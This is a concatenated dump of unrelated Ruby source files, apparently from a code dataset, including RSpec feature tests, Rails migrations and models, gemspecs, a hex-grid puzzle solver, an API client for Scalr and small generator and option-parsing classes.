let(:user) { create(:group_member, :developer, user: create(:user), group: group ).user }
before do
sign_in(user)
end
[:issue, :merge_request].each do |issuable|
issuable_name = issuable.to_s.humanize.downcase
project_relation = issuable == :issue ? :project : :source_project
context "for #{issuable_name}s" do
let(:path) { public_send(:"#{issuable}s_group_path", group) }
context 'group has a project' do
let(:project) { create(:project, namespace: group) }
before do
project.add_maintainer(user)
end
context "the project has #{issuable_name}s" do
it 'does not display an empty state' do
create(issuable, project_relation => project)
visit path
expect(page).not_to have_selector('.empty-state')
end
it "displays link to create new #{issuable} when no open #{issuable} is found", :js do
create("closed_#{issuable}", project_relation => project)
issuable_link_fn = "project_#{issuable}s_path"
visit public_send(issuable_link_fn, project)
wait_for_all_requests
page.within(find('.empty-state')) do
expect(page).to have_content(/There are no open #{issuable.to_s.humanize.downcase}/)
new_issuable_path = issuable == :issue ? 'new_project_issue_path' : 'project_new_merge_request_path'
path = public_send(new_issuable_path, project)
expect(page.find('a')['href']).to have_content(path)
end
end
it 'displays link to create new issue when the current search gave no results', :js do
create(issuable, project_relation => project)
issuable_link_fn = "project_#{issuable}s_path"
visit public_send(issuable_link_fn, project, author_username: 'foo', scope: 'all', state: 'opened')
wait_for_all_requests
page.within(find('.empty-state')) do
expect(page).to have_content(/Sorry, your filter produced no results/)
new_issuable_path = issuable == :issue ? 'new_project_issue_path' : 'project_new_merge_request_path'
path = public_send(new_issuable_path, project)
expect(page.find('a')['href']).to have_content(path)
end
end
it "displays conditional text when no closed #{issuable} is found", :js do
create(issuable, project_relation => project)
issuable_link_fn = "project_#{issuable}s_path"
visit public_send(issuable_link_fn, project, state: 'closed')
wait_for_all_requests
page.within(find('.empty-state')) do
expect(page).to have_content(/There are no closed #{issuable.to_s.humanize.downcase}/)
end
end
end
context "the project has no #{issuable_name}s", :js do
before do
visit path
end
it 'displays an empty state' do
expect(page).to have_selector('.empty-state')
end
it "shows a new #{issuable_name} button" do
within '.empty-state' do
expect(page).to have_content("create #{issuable_name}")
end
end
it "the new #{issuable_name} button opens a project dropdown" do
within '.empty-state' do
click_button 'Toggle project select'
end
expect(page).to have_selector('.ajax-project-dropdown')
end
end
end
shared_examples "no projects" do
it 'displays an empty state' do
expect(page).to have_selector('.empty-state')
end
it "does not show a new #{issuable_name} button" do
within '.empty-state' do
expect(page).not_to have_link("create #{issuable_name}")
end
end
end
context 'group without a project' do
context 'group has a subgroup' do
let(:subgroup) { create(:group, parent: group) }
let(:subgroup_project) { create(:project, namespace: subgroup) }
context "the project has #{issuable_name}s" do
before do
create(issuable, project_relation => subgroup_project)
visit path
end
it 'does not display an empty state' do
expect(page).not_to have_selector('.empty-state')
end
end
context "the project has no #{issuable_name}s" do
before do
visit path
end
it 'displays an empty state' do
expect(page).to have_selector('.empty-state')
end
end
end
context 'group has no subgroups' do
before do
visit path
end
it_behaves_like "no projects"
end
end
context 'group has only a project with issues disabled' do
let(:project_with_issues_disabled) { create(:empty_project, :issues_disabled, group: group) }
before do
visit path
end
it_behaves_like "no projects"
end
end
end
end
| 30.843931 | 114 | 0.589018 |
e28483466d299a9940ce7ef0c9ef1b8e69faab20 | 1325 | describe :enumeratorized_with_unknown_size, shared: true do
  describe "when no block is given" do
    describe "returned Enumerator" do
      # NATFIXME
      # (skipped via xit until Enumerator#size is supported)
      xit "size returns nil" do
        @object.send(*@method).size.should == nil
      end
    end
  end
end

# Shared examples for enumerators whose size equals the receiver's size.
describe :enumeratorized_with_origin_size, shared: true do
  describe "when no block is given" do
    describe "returned Enumerator" do
      # NATFIXME
      xit "size returns the enumerable size" do
        @object.send(*@method).size.should == @object.size
      end
    end
  end
end

# Shared examples for Enumerable#cycle's enumerator size semantics.
describe :enumeratorized_with_cycle_size, shared: true do
  describe "when no block is given" do
    describe "returned Enumerator" do
      describe "size" do
        it "should be the result of multiplying the enumerable size by the argument passed" do
          @object.cycle(2).size.should == @object.size * 2
          @object.cycle(7).size.should == @object.size * 7
          @object.cycle(0).size.should == 0
          @empty_object.cycle(2).size.should == 0
        end

        it "should be zero when the argument passed is 0 or less" do
          @object.cycle(-1).size.should == 0
        end

        it "should be Float::INFINITY when no argument is passed" do
          @object.cycle.size.should == Float::INFINITY
        end
      end
    end
  end
end
| 29.444444 | 94 | 0.642264 |
ff0b74fdd1ad115674a48e94d9957cfe9d9aad7a | 435 | class CreateUsers < ActiveRecord::Migration[5.2]
  # Creates the users table: identity/auth columns, profile and address
  # fields, plus the standard created_at/updated_at timestamps.
  def change
    create_table :users do |t|
      t.string :name
      t.string :email
      t.string :username
      # password_digest — conventional column for has_secure_password
      # (model not shown here; confirm).
      t.string :password_digest
      t.string :avatar_image
      t.string :status
      t.string :address
      t.string :city
      t.string :state
      t.string :zipcode
      t.date :birthday
      t.string :favorite_beauty_brands
      t.timestamps
    end
  end
end
| 21.75 | 48 | 0.627586 |
01aeab6b33ecb52b17cc74b81a09acb5b42fd8b4 | 981 | # -*- encoding: utf-8 -*-
require File.expand_path('../lib/flipper/version', __FILE__)
require File.expand_path('../lib/flipper/metadata', __FILE__)

# Select only the files belonging to the mongo adapter out of the
# monorepo's git file list.
flipper_mongo_files = lambda do |file|
  file =~ /mongo/
end

Gem::Specification.new do |gem|
  gem.authors       = ['John Nunemaker']
  gem.email         = ['[email protected]']
  gem.summary       = 'Mongo adapter for Flipper'
  gem.description   = 'Mongo adapter for Flipper'
  gem.license       = 'MIT'
  gem.homepage      = 'https://github.com/jnunemaker/flipper'

  # version.rb is shipped explicitly because the mongo filter excludes it.
  gem.files         = `git ls-files`.split("\n").select(&flipper_mongo_files) + ['lib/flipper/version.rb']
  gem.test_files    = `git ls-files -- {test,spec,features}/*`.split("\n").select(&flipper_mongo_files)
  gem.name          = 'flipper-mongo'
  gem.require_paths = ['lib']
  gem.version       = Flipper::VERSION
  gem.metadata      = Flipper::METADATA

  # Adapter tracks the core gem's version exactly.
  gem.add_dependency 'flipper', "~> #{Flipper::VERSION}"
  gem.add_dependency 'mongo', '~> 2.0'
end
| 36.333333 | 106 | 0.648318 |
f8add43b9e8b3063d381188345245085d04c22d7 | 2,259 | # frozen_string_literal: true
# Hex-tile floor (Advent of Code 2020, day 24). Tiles live on axial
# coordinates and toggle between :white and :black; each tile is stored
# as { state:, position: } keyed by its position hash.
class Floor
  attr_accessor :tiles

  # Grid system:
  # x: w-e
  # y: sw - ne
  MOVES = {
    'e' => { x: 1, y: 0 },
    'se' => { x: 1, y: -1 },
    'sw' => { x: 0, y: -1 },
    'w' => { x: -1, y: 0 },
    'nw' => { x: -1, y: 1 },
    'ne' => { x: 0, y: 1 }
  }.freeze

  def initialize
    @tiles = {}
  end

  # Parse one direction line, walk to the target tile and flip it.
  def process(line)
    position = tile_position(directions(line))
    tile = tiles[position] || { state: :white, position: position }
    @tiles[position] = flip_tile(tile)
  end

  # Tokenize a direction string ("esenee" => ["e", "se", "ne", "e"]),
  # stopping at the first unrecognized character.
  #
  # Fix: the previous implementation consumed the caller's string with
  # `sub!`, mutating the argument (and raising on frozen strings under
  # this file's frozen_string_literal pragma). This version is pure.
  def directions(line)
    tokens = []
    rest = line.to_s
    loop do
      token = rest.match(/\A(e|se|sw|w|nw|ne)/)
      break if token.nil?
      tokens << token[1]
      rest = token.post_match
    end
    tokens
  end

  # Fold a direction list into a coordinate, optionally starting from
  # +reference+ (which is cloned, not modified).
  def tile_position(directions, reference = nil)
    position = reference&.clone || { x: 0, y: 0 }
    directions.each do |move|
      position[:x] += MOVES[move][:x]
      position[:y] += MOVES[move][:y]
    end
    position
  end

  # Toggle a tile's colour in place and return it.
  def flip_tile(tile)
    tile[:state] = tile[:state] == :white ? :black : :white
    tile
  end

  def black_tiles(group = nil)
    (group || @tiles.values).select { |tile| tile[:state] == :black }
  end

  def white_tiles(group = nil)
    (group || @tiles.values).select { |tile| tile[:state] == :white }
  end

  # One round of the daily rules:
  #   black with zero or more than two black neighbours -> white
  #   white with exactly two black neighbours           -> black
  def daily_flip
    new_tiles = {}
    expand_scope
    @tiles.each_value do |tile|
      black_tiles_count = black_tiles(neighbor_tiles(tile)).length
      state =
        if tile[:state] == :black
          black_tiles_count.zero? || black_tiles_count > 2 ? :white : :black
        else
          black_tiles_count == 2 ? :black : :white
        end
      new_tiles[tile[:position]] = { state: state, position: tile[:position] }
    end
    @tiles = new_tiles
  end

  # Track every neighbour of a black tile so white tiles adjacent to
  # black ones can flip during daily_flip.
  def expand_scope
    black_tiles.each do |black_tile|
      neighbor_tiles(black_tile).each do |tile|
        @tiles[tile[:position]] ||= tile
      end
    end
  end

  # The six adjacent tiles (tracked ones, or fresh white placeholders).
  def neighbor_tiles(tile)
    MOVES.keys.map do |direction|
      position = tile_position([direction], tile[:position])
      @tiles[position] || { state: :white, position: position }
    end
  end
end
| 21.932039 | 81 | 0.570606 |
b9a397adb6f1c0333fd145477e8729968166330c | 700 | # frozen_string_literal: true
# Manages records which expire using the `expires_at` column.
#
# Fixes in this revision:
# * `scope :expired` previously used `where.not('expires_at < ?', ...)`,
#   which selected the records that had NOT yet expired — inverted logic.
# * `expires_in` previously returned `Time.now - expires_at`, the
#   negation of the time remaining.
module WithExpiration
  extend ActiveSupport::Concern

  included do
    # Records whose expiry time has already passed.
    scope :expired, -> { where('expires_at < ?', Time.now) }

    validates :expires_at, presence: true
  end

  # Set the expiration to occur by a duration
  #
  # @param duration [ActiveSupport::Duration, Numeric] how far in the future to set the expiry
  # @return [void]
  def expires_in=(duration)
    self.expires_at = duration.from_now
  end

  # @return [Float] seconds remaining before this expires (negative once past)
  def expires_in
    expires_at - Time.now
  end

  # @return [Boolean] whether this has expired yet (nil when expires_at is unset)
  def expired?
    expires_at&.past?
  end
end
| 22.580645 | 69 | 0.708571 |
21de187e315bb2695a14081cfffe68f6796fbd18 | 1,160 | module Ubiquitously
module MvcForge
class Account < Ubiquitously::Service::Account
# raises Net::HTTPForbidden 403 if already logged in
def login
page = agent.get("http://mvcforge.com/user/login")
form = page.forms.detect { |form| form.form_node["id"] == "user-login" }
form["name"] = username
form["pass"] = password
page = form.submit
authorize!(page.parser.css(".messages.error").text.to_s !~ /unrecognized username or password/i)
end
end
class Post < Ubiquitously::Service::Post
def create
page = agent.get("http://mvcforge.com/submit")
form = page.form_with(:action => "/submit")
form["url"] = token[:url]
form["title"] = token[:title]
form["body"] = token[:description]
form["taxonomy[tags][3]"]
form.field_with(:name => "taxonomy[1]").options.each do |option|
option.select if option.value.to_s == "90"
end
form["op"] = "Submit"
page = form.submit(form.button_with(:value => "Submit"))
true
end
end
end
end
| 30.526316 | 104 | 0.564655 |
1cb18c4efac593a3640cd966af4289c9663c42d5 | 311 | class ConfirmationsController < ApplicationController
def show
user = User.confirm_by_token(params[:confirmation_token])
if user.errors.empty?
redirect_to root_path, notice: t('confirmations.confirmed')
else
redirect_to root_path, danger: t('confirmations.failure')
end
end
end
| 25.916667 | 65 | 0.73955 |
39db1652877a680432b68b8df28027142adbfced | 5,627 | require 'uri'
require 'hmac'
require 'hmac-sha2'
require 'base64'
require 'net/https'
require 'net/http'
module Scalr
class Request
class ScalrError < RuntimeError; end
class InvalidInputError < ScalrError; end
ACTIONS = {
:bundle_task_get_status => {:name => 'BundleTaskGetStatus', :inputs => {:bundle_task_id => true}},
:dns_zone_create => {:name => 'DNSZoneCreate', :inputs => {:domain_name => true, :farm_id => false, :farm_role_id => false}},
:dns_zone_record_add => {:name => 'DNSZoneRecordAdd', :inputs => {:zone_name => true, :type => true, :ttl => true, :name => true, :value => true, :priority => false, :weight => false, :port => false}},
:dns_zone_record_remove => {:name => 'DNSZoneRecordRemove', :inputs => {:zone_name => true, :record_id => true}},
:dns_zone_records_list => {:name => 'DNSZoneRecordsList', :inputs => {:zone_name => true}},
:dns_zones_list => {:name => 'DNSZonesList', :inputs => {}},
:events_list => {:name => 'EventsList', :inputs => {:farm_id => true, :start_from => false, :records_limit => false}},
:farm_get_details => {:name => 'FarmGetDetails', :inputs => {:farm_id => true}},
:farm_get_stats => {:name => 'FarmGetStats', :inputs => {:farm_id => true, :date => false}},
:farms_list => {:name => 'FarmsList', :inputs => {}},
:farm_terminate => {:name => 'FarmTerminate', :inputs => {:farm_id => true, :keep_ebs => true, :keep_eip => false, :keep_dns_zone => false}},
:farm_launch => {:name => 'FarmLaunch', :inputs => {:farm_id => true}},
:logs_list => {:name => 'LogsList', :inputs => {:farm_id => true, :server_id => true, :start_from => false, :records_limit => false}},
:roles_list => {:name => 'RolesList', :inputs => {:platform => false, :name => false, :prefix => false, :image_id => false}},
:script_execute => {:name => 'ScriptExecute', :inputs => {:farm_role_id => false, :server_id => false, :farm_id => true, :script_id => true, :timeout => true, :async => true, :revision => false, :config_variables => false}},
:script_get_details => {:name => 'ScriptGetDetails', :inputs => {:script_id => true}},
:scripts_list => {:name => 'ScriptsList', :inputs => {}},
:server_image_create => {:name => 'ServerImageCreate', :inputs => {:server_id => true, :role_name => true}},
:server_launch => {:name => 'ServerLaunch', :inputs => {:farm_role_id => true}},
:server_reboot => {:name => 'ServerReboot', :inputs => {:server_id => true}},
:server_terminate => {:name => 'ServerTerminate', :inputs => {:server_id => true, :decrease_min_instances_setting => false}},
:statistics_get_graph_url => {:name => 'StatisticsGetGraphURL', :inputs => {:object_type => true, :object_id => true, :watcher_name => true, :graph_type => true}}
}
INPUTS = {
:async => 'Async',
:bundle_task_id => 'BundleTaskID',
:config_variables => 'ConfigVariables',
:date => 'Date',
:decrease_min_instances_setting => 'DecreaseMinInstancesSetting',
:domain_name => 'DomainName',
:farm_id => 'FarmID',
:farm_role_id => 'FarmRoleID',
:graph_type => 'GraphType',
:image_id => 'ImageID',
:keep_dns_zone => 'KeepDNSZone',
:keep_ebs => 'KeepEBS',
:keep_eip => 'KeepEIP',
:key => 'Key',
:name => 'Name',
:object_id => 'ObjectID',
:object_type => 'ObjectType',
:platform => 'Platform',
:port => 'Port',
:prefix => 'Prefix',
:priority => 'Priority',
:record_id => 'RecordID',
:records_limit => 'RecordsLimit',
:revision => 'Revision',
:role_name => 'RoleName',
:script_id => 'ScriptID',
:server_id => 'ServerID',
:start_from => 'StartFrom',
:timeout => 'Timeout',
:ttl => 'TTL',
:type => 'Type',
:value => 'Value',
:watcher_name => 'WatcherName',
:weight => 'Weight',
:zone_name => 'ZoneName'
}
attr_accessor :inputs, :endpoint, :access_key, :signature
def initialize(action, endpoint, key_id, access_key, version, *arguments)
set_inputs(action, arguments.flatten.first)
@inputs.merge!('Action' => ACTIONS[action.to_sym][:name], 'KeyID' => key_id, 'Version' => version, 'Timestamp' => Time.now.utc.iso8601)
@endpoint = endpoint
@access_key = access_key
end
def process!
set_signature!
http = Net::HTTP.new(@endpoint, 443)
http.use_ssl = true
response, data = http.get("/?" + query_string + "&Signature=#{URI.escape(@signature)}", nil)
return Scalr::Response.new(response, data)
end
private
def set_inputs(action, input_hash)
input_hash ||= {}
raise InvalidInputError.new unless input_hash.is_a? Hash
ACTIONS[action][:inputs].each do |key, value|
raise InvalidInputError.new("Missing required input: #{key.to_s}") if value and input_hash[key].nil?
end
@inputs = {}
input_hash.each do |key, value|
raise InvalidInputError.new("Unknown input: #{key.to_s}") if ACTIONS[action][:inputs][key].nil?
@inputs[INPUTS[key]] = value.to_s
end
end
def query_string
@inputs.sort.collect { |key, value| [URI.escape(key.to_s), URI.escape(value.to_s)].join('=') }.join('&')
end
def set_signature!
string_to_sign = query_string.gsub('=','').gsub('&','')
hmac = HMAC::SHA256.new(@access_key)
hmac.update(string_to_sign)
@signature = Base64.encode64(hmac.digest).chomp
end
end
end | 46.891667 | 230 | 0.594278 |
d53dc6ce0afd595ee0128cbefc25093d261760f8 | 762 | require 'rails_helper'
# Model specs for Category: basic validity of the factory object, name
# presence validation, priority numericality validation, and the
# has_many :articles association.
RSpec.describe Category, type: :model do
  context 'Validations for Category' do
    # NOTE(review): assumes the :category factory supplies a valid name
    # and integer priority -- confirm against the factory definitions.
    let(:category) { FactoryBot.create :category }
    it 'should be valid' do
      expect(category).to be_valid
    end
    it 'should be present' do
      expect(category).to be_present
    end
    # A whitespace-only name must fail the presence validation.
    it 'should not be spaces for name' do
      category.name = ' '
      expect(category).to_not be_valid
    end
    it 'should not be valid if priority is not an integer' do
      category.priority = nil
      expect(category).to_not be_valid
    end
  end
  context 'Associations with category table' do
    # Inspects the association reflection rather than hitting the database.
    it 'has many articles' do
      assc = Category.reflect_on_association(:articles)
      expect(assc.macro).to eq :has_many
    end
  end
end
| 23.090909 | 61 | 0.671916 |
e8883b1c333c6da9539701089b4c6f1a1a7149d0 | 2,346 | # this generator based on rails_admin's install generator.
# https://www.github.com/sferik/rails_admin/master/lib/generators/rails_admin/install_generator.rb
require 'rails/generators'
# http://guides.rubyonrails.org/generators.html
# http://rdoc.info/github/wycats/thor/master/Thor/Actions.html
module Koudoku
  # Rails generator that installs Koudoku into a host application:
  # copies the initializer, generates the Coupon, Plan and Subscription
  # models, wires the has_one association onto the owner model, and
  # mounts the engine's routes.
  class InstallGenerator < Rails::Generators::Base
    # Templates are looked up in the engine root first, then in this
    # generator's local templates directory.
    def self.source_paths
      [Koudoku::Engine.root, File.expand_path("../templates", __FILE__)]
    end
    include Rails::Generators::Migration
    argument :subscription_owner_model, :type => :string, :required => true, :desc => "Owner of the subscription"
    desc "Koudoku installation generator"
    # Override the attr_accessor generated by 'argument' so that
    # subscription_owner_model is always returned lowercase.
    def subscription_owner_model
      @subscription_owner_model.downcase
    end
    # Main entry point; each step below runs in order when the generator
    # is invoked.
    def install
      unless defined?(Koudoku)
        gem("koudoku")
      end
      # NOTE(review): presumably needed by the initializer template's
      # binding (e.g. to generate a secret) -- confirm against
      # templates/config/initializers/koudoku.rb.
      require "securerandom"
      template "config/initializers/koudoku.rb"
      # Add coupons.
      generate("model coupon code:string free_trial_length:string")
      template "app/models/coupon.rb"
      # Add the plans.
      generate("model", "plan name:string stripe_id:string price:float interval:string features:text highlight:boolean display_order:integer")
      template "app/models/plan.rb"
      # Generate subscription.
      generate("model", "subscription stripe_id:string plan:references last_four:string coupon:references card_type:string current_price:float #{subscription_owner_model}:references")
      template "app/models/subscription.rb"
      # Update the owner relationship.
      inject_into_class "app/models/#{subscription_owner_model}.rb", subscription_owner_model.camelize.constantize,
        "# Added by Koudoku.\n  has_one :subscription\n\n"
      # Install the pricing table.
      copy_file "app/views/koudoku/subscriptions/_social_proof.html.erb"
      # Add webhooks to the route.
      route <<-RUBY
        # Added by Koudoku.
        mount Koudoku::Engine, at: 'koudoku'
        scope module: 'koudoku' do
          get 'pricing' => 'subscriptions#index', as: 'pricing'
        end
      RUBY
      # Show the user the API key we generated.
      say "\nTo enable support for Stripe webhooks, point it to \"/koudoku/events\"."
    end
  end
end
| 31.28 | 183 | 0.712276 |
282443e4a25a9cfe979d3d0ffa45eba33b61679a | 103 | module GrowlGlue
module Util
def with(obj)
yield obj
obj
end
end
end
| 9.363636 | 17 | 0.533981 |
1d558e3fc487ec22973c713e6bd4509af07bba25 | 480 | require 'formula'
# Homebrew formula for webfs, a simple HTTP server for static content.
# NOTE(review): the `sha1` and `patch :p0 do` stanzas belong to an old
# Homebrew DSL generation; current Homebrew requires sha256 checksums.
class Webfs < Formula
  homepage 'http://linux.bytesex.org/misc/webfs.html'
  url 'http://dl.bytesex.org/releases/webfs/webfs-1.21.tar.gz'
  sha1 'a38880d8cb21e415244d220115ede7b573ac890c'
  # MacPorts patch to ls.c for the macOS build.
  patch :p0 do
    url "https://trac.macports.org/export/21504/trunk/dports/www/webfs/files/patch-ls.c"
    sha1 "0c408afff6df5b85f3c61afd4f44eb1944ba3a17"
  end
  def install
    # The Makefile reads the install prefix from the environment.
    ENV["prefix"]=prefix
    # Point webfs at Apache's mime.types so it serves correct
    # Content-Type headers.
    system "make install mimefile=/etc/apache2/mime.types"
  end
end
| 26.666667 | 88 | 0.74375 |
6125a818c38e6b19cff57ac43aa18e63a2864f26 | 9,509 | #
# This class was auto-generated.
#
require 'onlinepayments/sdk/api_resource'
require 'onlinepayments/sdk/response_exception'
require 'onlinepayments/sdk/domain/error_response'
require 'onlinepayments/sdk/domain/get_payment_products_response'
require 'onlinepayments/sdk/domain/payment_product'
require 'onlinepayments/sdk/domain/payment_product_networks_response'
require 'onlinepayments/sdk/domain/product_directory'
require 'onlinepayments/sdk/merchant/products/get_payment_product_networks_params'
require 'onlinepayments/sdk/merchant/products/get_payment_product_params'
require 'onlinepayments/sdk/merchant/products/get_payment_products_params'
require 'onlinepayments/sdk/merchant/products/get_product_directory_params'
module OnlinePayments::SDK
  module Merchant
    module Products
      # Products client. Thread-safe.
      #
      # Every call follows the same shape: build the resource URI, issue a
      # GET through the communicator, and convert any ResponseException into
      # the most specific SDK exception (see #create_api_exception). The
      # previously duplicated rescue/unmarshal/raise sequence is factored
      # into that single private helper.
      class ProductsClient < OnlinePayments::SDK::ApiResource
        # @param parent [OnlinePayments::SDK::ApiResource]
        # @param path_context [Hash, nil]
        def initialize(parent, path_context = nil)
          super(parent, path_context)
        end

        # Resource /v2/!{merchantId}/products
        # @param query [OnlinePayments::SDK::Merchant::Products::GetPaymentProductsParams]
        # @param context [OnlinePayments::SDK::CallContext]
        # @return [OnlinePayments::SDK::Domain::GetPaymentProductsResponse]
        # @raise [OnlinePayments::SDK::ValidationException] if the request was not correct and couldn't be processed (HTTP status code 400)
        # @raise [OnlinePayments::SDK::AuthorizationException] if the request was not allowed (HTTP status code 403)
        # @raise [OnlinePayments::SDK::IdempotenceException] if an idempotent request caused a conflict (HTTP status code 409)
        # @raise [OnlinePayments::SDK::ReferenceException] if an object was attempted to be referenced that doesn't exist or has been removed,
        #   or there was a conflict (HTTP status code 404, 409 or 410)
        # @raise [OnlinePayments::SDK::PaymentPlatformException] if something went wrong at the payment platform,
        #   the payment platform was unable to process a message from a downstream partner/acquirer,
        #   or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
        # @raise [OnlinePayments::SDK::ApiException] if the payment platform returned any other error
        def get_payment_products(query, context = nil)
          uri = instantiate_uri('/v2/{merchantId}/products')
          @communicator.get(
            uri,
            client_headers,
            query,
            OnlinePayments::SDK::Domain::GetPaymentProductsResponse,
            context
          )
        rescue ResponseException => e
          raise create_api_exception(e, context)
        end

        # Resource /v2/!{merchantId}/products/!{paymentProductId}
        # @param payment_product_id [Integer]
        # @param query [OnlinePayments::SDK::Merchant::Products::GetPaymentProductParams]
        # @param context [OnlinePayments::SDK::CallContext]
        # @return [OnlinePayments::SDK::Domain::PaymentProduct]
        # @raise [OnlinePayments::SDK::ValidationException] if the request was not correct and couldn't be processed (HTTP status code 400)
        # @raise [OnlinePayments::SDK::AuthorizationException] if the request was not allowed (HTTP status code 403)
        # @raise [OnlinePayments::SDK::IdempotenceException] if an idempotent request caused a conflict (HTTP status code 409)
        # @raise [OnlinePayments::SDK::ReferenceException] if an object was attempted to be referenced that doesn't exist or has been removed,
        #   or there was a conflict (HTTP status code 404, 409 or 410)
        # @raise [OnlinePayments::SDK::PaymentPlatformException] if something went wrong at the payment platform,
        #   the payment platform was unable to process a message from a downstream partner/acquirer,
        #   or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
        # @raise [OnlinePayments::SDK::ApiException] if the payment platform returned any other error
        def get_payment_product(payment_product_id, query, context = nil)
          path_context = {
            'paymentProductId'.freeze => payment_product_id.to_s,
          }
          uri = instantiate_uri('/v2/{merchantId}/products/{paymentProductId}', path_context)
          @communicator.get(
            uri,
            client_headers,
            query,
            OnlinePayments::SDK::Domain::PaymentProduct,
            context
          )
        rescue ResponseException => e
          raise create_api_exception(e, context)
        end

        # Resource /v2/!{merchantId}/products/!{paymentProductId}/directory
        # @param payment_product_id [Integer]
        # @param query [OnlinePayments::SDK::Merchant::Products::GetProductDirectoryParams]
        # @param context [OnlinePayments::SDK::CallContext]
        # @return [OnlinePayments::SDK::Domain::ProductDirectory]
        # @raise [OnlinePayments::SDK::ValidationException] if the request was not correct and couldn't be processed (HTTP status code 400)
        # @raise [OnlinePayments::SDK::AuthorizationException] if the request was not allowed (HTTP status code 403)
        # @raise [OnlinePayments::SDK::IdempotenceException] if an idempotent request caused a conflict (HTTP status code 409)
        # @raise [OnlinePayments::SDK::ReferenceException] if an object was attempted to be referenced that doesn't exist or has been removed,
        #   or there was a conflict (HTTP status code 404, 409 or 410)
        # @raise [OnlinePayments::SDK::PaymentPlatformException] if something went wrong at the payment platform,
        #   the payment platform was unable to process a message from a downstream partner/acquirer,
        #   or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
        # @raise [OnlinePayments::SDK::ApiException] if the payment platform returned any other error
        def get_product_directory(payment_product_id, query, context = nil)
          path_context = {
            'paymentProductId'.freeze => payment_product_id.to_s,
          }
          uri = instantiate_uri('/v2/{merchantId}/products/{paymentProductId}/directory', path_context)
          @communicator.get(
            uri,
            client_headers,
            query,
            OnlinePayments::SDK::Domain::ProductDirectory,
            context
          )
        rescue ResponseException => e
          raise create_api_exception(e, context)
        end

        # Resource /v2/!{merchantId}/products/!{paymentProductId}/networks
        # @param payment_product_id [Integer]
        # @param query [OnlinePayments::SDK::Merchant::Products::GetPaymentProductNetworksParams]
        # @param context [OnlinePayments::SDK::CallContext]
        # @return [OnlinePayments::SDK::Domain::PaymentProductNetworksResponse]
        # @raise [OnlinePayments::SDK::ValidationException] if the request was not correct and couldn't be processed (HTTP status code 400)
        # @raise [OnlinePayments::SDK::AuthorizationException] if the request was not allowed (HTTP status code 403)
        # @raise [OnlinePayments::SDK::IdempotenceException] if an idempotent request caused a conflict (HTTP status code 409)
        # @raise [OnlinePayments::SDK::ReferenceException] if an object was attempted to be referenced that doesn't exist or has been removed,
        #   or there was a conflict (HTTP status code 404, 409 or 410)
        # @raise [OnlinePayments::SDK::PaymentPlatformException] if something went wrong at the payment platform,
        #   the payment platform was unable to process a message from a downstream partner/acquirer,
        #   or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
        # @raise [OnlinePayments::SDK::ApiException] if the payment platform returned any other error
        def get_payment_product_networks(payment_product_id, query, context = nil)
          path_context = {
            'paymentProductId'.freeze => payment_product_id.to_s,
          }
          uri = instantiate_uri('/v2/{merchantId}/products/{paymentProductId}/networks', path_context)
          @communicator.get(
            uri,
            client_headers,
            query,
            OnlinePayments::SDK::Domain::PaymentProductNetworksResponse,
            context
          )
        rescue ResponseException => e
          raise create_api_exception(e, context)
        end

        private

        # Unmarshals the ErrorResponse body of a failed call and wraps it in
        # the SDK exception matching the HTTP status code (via the inherited
        # #create_exception).
        # @param e [OnlinePayments::SDK::ResponseException] raw transport failure
        # @param context [OnlinePayments::SDK::CallContext, nil]
        # @return [OnlinePayments::SDK::ApiException] exception ready to raise
        def create_api_exception(e, context)
          error_object = @communicator.marshaller.unmarshal(e.body, OnlinePayments::SDK::Domain::ErrorResponse)
          create_exception(e.status_code, e.body, error_object, context)
        end
      end
    end
  end
end
| 60.955128 | 142 | 0.688506 |
26748b84614a533ebf1b4842c2a049a088a6dbcd | 1,481 | MetricFu.lib_require { "formatter/syntax" }
MetricFu.lib_require { "templates/template" }
# Creates an HTML document for a given analyzed file,
# with scored metrics annotating the relevant line.
module MetricFu
  module Templates
    class Report < MetricFu::Template
      # @param file [String] the analyzed file to annotate
      # @param lines [Hash] line number [String] keyed to a list [Array] of metrics for that line. Each metric in the list is a hash containing the keys :type => metric_name, :description => metric_score
      # @example file and lines
      #   file: "lib/metric_fu/gem_version.rb"
      #   lines: {"30"=>[{:type=>:flog, :description=>"Score of 22.43"}], "42"=>[{:type=>:flog, :description=>"Score of 8.64"}]}
      def initialize(file, lines)
        @file = file
        @lines = lines
        # Read in binary mode so unusual encodings don't raise here.
        @data = File.open(file, "rb") { |f| f.readlines }
      end

      # Renders the annotated source listing via the "report" ERB template.
      def render
        erbify("report")
      end

      # Syntax-highlights one line of Ruby source as HTML.
      def convert_ruby_to_html(ruby_text, line_number)
        MetricFu::Formatter::Syntax.new.highlight(ruby_text, line_number)
      end

      # Returns the HTML markup for one source line: syntax-highlighted when
      # the "syntax_highlighting" template option is enabled, otherwise the
      # raw line prefixed with a named anchor for deep-linking.
      def line_for_display(line, line_number)
        if MetricFu::Formatter::Templates.option("syntax_highlighting")
          convert_ruby_to_html(line, line_number)
        else
          # Fix: the href needs a leading '#' to be a fragment link; the
          # previous href='n123' resolved as a relative path instead of
          # jumping to the anchor on the same page.
          "<a name='n#{line_number}' href='#n#{line_number}'>#{line_number}</a>#{line}"
        end
      end

      # Templates for this report live alongside this file.
      def template_directory
        File.dirname(__FILE__)
      end
    end
  end
end
| 35.261905 | 207 | 0.649561 |
e92bcdde1e5c0def2743e254027a979de67e8f3a | 1,147 | require 'optparse'
module MPD2HTML
  # Parses and validates the command-line arguments for mpd2html.
  class Options
    attr_reader :output_dir, :verbose, :files

    def initialize
      @output_dir = nil
    end

    # Parse ARGV destructively. Aborts with a usage message on invalid
    # options, a missing output directory, or missing input files;
    # otherwise populates #output_dir, #verbose and #files.
    def parse!
      parser = OptionParser.new do |opts|
        opts.banner = "Usage: #{$PROGRAM_NAME} -o OUTPUT_DIR [other options] file [...]"
        opts.on('-o OUTPUT_DIR', "Output directory") { |dir| @output_dir = dir }
        opts.on('-v', "Verbose") { @verbose = true }
        # -h and --help work by default, but implement them explicitly so they're
        # documented
        opts.on("-h", "--help", "Prints this help") do
          warn opts.to_s
          exit
        end
      end
      begin
        parser.parse!
      rescue OptionParser::ParseError
        abort parser.to_s
      end
      abort_with_help parser, "Please specify an output directory with -o." unless @output_dir
      abort_with_help parser, "Please specify one or more input files." if ARGV.empty?
      @files = ARGV
    end

    # Print +message+ followed by the usage text and exit with failure.
    def abort_with_help(parser, message)
      abort "#{message}\n#{parser}"
    end
